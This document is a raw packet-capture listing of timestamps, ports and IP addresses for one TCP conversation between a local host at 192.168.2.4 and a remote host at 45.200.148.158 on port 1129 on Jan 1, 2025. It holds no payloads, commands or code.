Jan 1, 2025 18:10:01.769360065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.769366026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.769388914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.822832108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.822856903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.822870970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.822875023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.822930098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.823004961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.823015928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.823035002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.823049068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.823050976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.823095083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.823204994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832720995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832731009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832756996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832761049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.832799911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.832818031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832834959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832956076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832966089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832974911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.832983017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.832990885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.833228111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833271027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833281994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833297968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.833317995 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.833370924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833456039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833467007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833484888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.833498001 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.833515882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.839356899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839396954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839407921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839447021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.839576006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839587927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839605093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839618921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.839622974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839656115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.839833021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839844942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839864016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839880943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.839880943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.839905977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.840094090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840109110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840126038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840140104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.840141058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840153933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840157032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.840198040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.840362072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840385914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840399027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840410948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840428114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.840437889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.840464115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.846820116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.846831083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.846864939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.846868992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.846906900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.846910954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.847049952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.847062111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.847093105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.847131968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.847176075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.847178936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852663040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852703094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852714062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852714062 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.852833986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852837086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.852844954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852958918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.852963924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.852971077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853005886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853138924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853151083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853167057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853183031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853190899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853193998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853215933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853441954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853452921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853482008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853615046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853624105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853638887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853651047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853652954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853668928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853677034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853687048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853699923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853708029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.853717089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.853744984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854029894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854041100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854063988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854068041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854079962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854101896 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854252100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854266882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854281902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854286909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854294062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854330063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854505062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854515076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854531050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854542017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854549885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854558945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854558945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854569912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854592085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854593992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854605913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854624033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.854625940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.854659081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855041027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855051994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855068922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855082989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855098963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855099916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855109930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855110884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855165005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855346918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855355978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855401039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855403900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855416059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855427027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855443001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855453968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855459929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855473042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855482101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855513096 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.855947971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855959892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855978966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.855988979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856005907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856015921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856021881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.856029034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.856034040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856045961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856055021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.856060028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856075048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856082916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.856092930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856101990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856112003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856122017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.856134892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.856139898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.856184006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.909718990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909733057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909753084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909785986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.909919024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909929991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909946918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909959078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.909981012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.909992933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.919543982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919553995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919569969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919601917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.919635057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.919712067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919740915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919758081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919780016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.919909000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919919968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.919951916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.919970989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920008898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.920037985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920049906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920090914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.920156002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920186996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920229912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.920289040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920300961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920315981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.920337915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926033020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926054955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926065922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926079035 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926110029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926171064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926182032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926222086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926282883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926295042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926345110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926398039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926407099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926448107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926469088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926567078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926578045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926597118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926608086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926609993 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926639080 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926795006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926805973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926836967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.926914930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926924944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.926959991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.927026033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927037001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927052021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927058935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.927088022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.927227974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927239895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927259922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927274942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.927297115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.927330017 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.933690071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.933729887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.933739901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.933780909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.933813095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.933912039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.933923960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.933949947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.933963060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.934024096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.934035063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.934087038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.939374924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939415932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939428091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939472914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.939557076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939568996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939588070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939594030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.939623117 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.939754009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939865112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939877033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939896107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939908028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.939913034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.939954996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940077066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940092087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940119982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940138102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940152884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940170050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940176010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940185070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940212965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940444946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940457106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940478086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940495968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940524101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940660000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940670967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940706015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940768003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940778971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940798044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940813065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940819025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940829039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940843105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.940849066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.940879107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941164970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941178083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941194057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941205978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941215992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941226006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941239119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941242933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941257000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941278934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941529036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941544056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941564083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941720963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941731930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941749096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941756964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941762924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941776037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941786051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941793919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941808939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941817045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.941826105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.941836119 CET	1129	49730	45.200.148.158	192.168.2.4
